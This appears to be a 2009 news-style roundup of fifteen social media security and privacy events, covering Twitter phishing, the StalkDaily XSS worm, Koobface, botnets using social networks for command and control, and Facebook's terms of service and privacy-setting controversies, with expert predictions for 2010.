Co-Authored with Tom Eston, SocialMediaSecurity.com
This year was momentous for social media. Twitter exploded, garnering global press and even a visit to the Oprah Winfrey Show. Facebook ate up rival social network FriendFeed and overhauled pretty much, well, everything. And, finally, businesses truly started attaching themselves to some sort of internal social media-related programs.
Leave it to the hackers to spoil all of the fun.
This year was certainly not without its challenges, especially for the more popular social networks mentioned above. New vulnerabilities targeted social network soft spots, while the social engineering of less-than-savvy Internet users reached new heights. The experts say that it won't get any better next year, either.
"We are going to see a lot more of the same in 2010 in terms of social networking and security issues, specifically a lot more privacy leaks and data leakage," said Dennis Cox, CTO and co-founder of BreakingPoint Systems, a provider of performance and security testing tools. "But I also see that hijacking of accounts is going to be much more prominent, particularly with celebrities, executives of large public companies and politicians who have a lot to lose."
That said, let's look at 15 significant social media and security/privacy events of 2009:
1. First Large Twitter Phishing AttackThe first widespread Twitter phishing attack in January was Internet social engineering at its finest. It's old hat now, but users were taunted into clicking on a link to a fake Twitter site. How did this happen? The phishers preyed on the insecurity and ego of the victims by promising them a newly discovered funny blog post...about them. Of course, they were then redirected back to Twitter, making it appear as if they had gotten locked out, and had to re-enter their credentials. Voila, welcome to a compromised account.
2. Weak Twitter Support Admin Password Leads to Compromised AccountsAccording to Wired, an 18-year-old hacker took responsibility for hijacking 33 high-profile Twitter accounts with a rapid-fire dictionary on the Twitter support portal page. The password: "happiness." This was an embarrassment for Twitter (which now imposes a rate limit to lock out users after multiple failed password attempts), and a wake-up call everywhere for people with simple, dictionary-based passwords.
3. Rogue LinkedIn Profiles Lead Users to MalwareUsually perceived to be the safer of the popular social networks due to more passive use, LinkedIn itself succumbed to some rogue activity in January in which attackers created fake celebrity profiles in an attempt to lure users to malware-laden sites. A McAfee security researcher discovered that hundreds of fake LinkedIn profiles promising everything from a nude "Kate Hudson" to a nude “Hulk Hogan” not only existed but were driving users from LinkedIn to Web sites containing obfuscated script code which decodes to a simple browser redirection. According to McAfee, as user would "end up on different malicious websites trying the classical social-engineering tricks of either the 'missing video codec' or of showing a fake AV scan and telling that the user his computer was infected with malware and offering a 'free' AV scanner software, which in fact is the real threat."
4. Facebook Changes TOS... and Changes its MindFacebook started a wildfire debate in February when the goliath social network issued new Terms of Service (TOS) and then retracted them due to an overwhelmingly negative response from users. The retracted TOS essentially said that Facebook held ownership over all users' content even if profiles were deleted, and that this content “could be used, modified or sublicensed." Protest groups sprouted up regarding Facebook's attempt to keep all of its users data forever. However, even though the TOS were taken back and Facebook went through trememdous efforts to "include" users in its TOS update, this event was an ah-ha moment that further showed users how unprotected their data is on social networks.
Next: Rogue Applications Run Rampant -->
5. Rogue Facebook Applications FoundIn February, two alarming rogue Facebook applications were found. The first notified users that their friends had trouble viewing the recipient's profile, and the notification prompted that recipient to click through to check the errors. Rather than clicking through to Facebook, however, the user ended up on another application that, if installed, would collect their personal details. The second rogue app told notification recipients that a friend had reported them to Facebook for alleged TOS violations. When the concerned user would click to learn more, he or she might've installed an application that then spammed friends and potentially harvested personal information.
6. Twitter Hit by StalkDaily; Exposes XSS IssuesJump forward to April when a malicious site that was spreading links on Twitter to another malicious site without user consent via a cross-site scripting vulnerability. Users could become infected and get locked out of their accounts while the worm spammed other users, and so on. With this being a XSS attack, it forced Twitter to further change its security measures in order to to reduce the probability of these types of attacks.
7. More Privacy Issues for Facebook: Canadian VersionThe Office of the Privacy Commissioner of Canada issued a report in July stating that Facebook did not comply with the country's strict privacy laws and gave the social network 30 days to make required changes. Facebook promptly responded and worked with the Privacy Commission to come to a privacy agreement before 12 million Canadian users were impacted.
8. Month of Twitter BugsIn an effort to make Twitter more aggressively address its API issues, security researcher Aviv Raff announced the "Month of Twitter Bugs." During this month Raff promised to publish a new vulnerability in a third-party Twitter service or application. He gave Twitter 24-hours notice prior to publishing a vulnerability. This effort made Twitter -- and users -- more aware than ever of the security vulnerabilities in its offering.
9. Twitter-Based BotNet Command Channel FoundIn August, a researcher at Arbor Networks, found a botnet that uses Twitter as its command and control structure. According to the researcher, the botnet uses status messages to "send out new links to contact, then these contain new commands or executables to download and run. It’s an infostealer operation." It was reported that the botnet successfully infected thousands of PCs before it was shut down by Twitter.
10. Month of Facebook Bugs
Similar to the Month of Twitter Bugs, security researcher theharmonyguy launched the Month of Facebook Bugs, in which he reported to Facebook daily vulnerabilities that were come through to the site through their applications. The discoveries that he made were quite telling, from how not private Facebook user data is at all, to holes in the social network's application development process and the lack of necessary app sanitation before publishing them to users.
Next: Koobface and Crimeware -->
11. New Research Exposes More of KoobfaceTrend Micro security researcher Ryan Flores published an enlightening blog post, and research paper, highlighting several new discoveries about the notorious Koobface worm. Koobface, which started out as a Facebook attack but spread to both Twitter and MySpace, was reported to be stealing user pictures in addition to personal information. Flores also said that Koobface is able to bypass Facebook's spam filtering.
12. Hacked Facebook Apps Push Fake AV SoftwareSecurity company AVG discovered that a handful of Facebook applications had been hacked and were pushing fake antivirus software, which in fact was actually in fact administering viruses to users. The applications were generating iFrames with "information" about antivirus trends and offered a fake "solution."
13. Facebook Used as Command and Control for CrimewareAs reported in The Register, crimeware distributors started using Facebook as a command and control channel for a "Trojan that turns compromised Windows PCs into zombie drones." According to the article, zombie clients polled the Notes section of Facebook through its mobile clients to receive instructions. The client would then spread booby-trapped email attachments.
14. New Facebook Privacy SettingsLikely fresh in everyone's mind, Facebook just last week pushed live its new privacy settings, which claimed to give users additional control over their profile information, and make privacy settings easier to use for novice site members. The issues that crept up, and are still points of discussion, is how Facebook is now giving users the appearance of having more privacy controls while really they have less privacy. Unless users want to completely remove themselves from the search database they cannot hide their main photos, friends lists, or fan pages. In this effort to make Facebook more private, the social network exposed more of its users (a move that makes one wonder if advertising demographics are more important than user privacy).
15. 3,500 New York Sex Offenders Taken Off of SocNet SitesFifteen social network sites total have now removed, or will remove, 3,500 New York sex offenders from their databases and block use of the sites by these users. The social networks have agreed to use New York's Securing and Targeting of Online Predators Act, also known as e-STOP, which requires that registered sex offenders also report their email addresses, screen names and other Internet identifiers with authorities.
Again, BreakingPoint's Cox believes that this year's security issues are only the tip of the iceberg. He predicts that social networks will witness much more cybercrime led by organized syndicates.
"This is a no-brainer for organized crime and it is already happening as people move more and more of their information to social networks, connect them to various accounts and basically provide easy access for anyone through their computers, or even an iPhone," he said. "On the flip side of threats, you will unfortunately see more violent crime spawned through social network interaction and police using social networking updates as evidence in criminal cases. This, of course, will lead to more privacy issues as we will witness the government probing into social networks more to grab data about our online activities."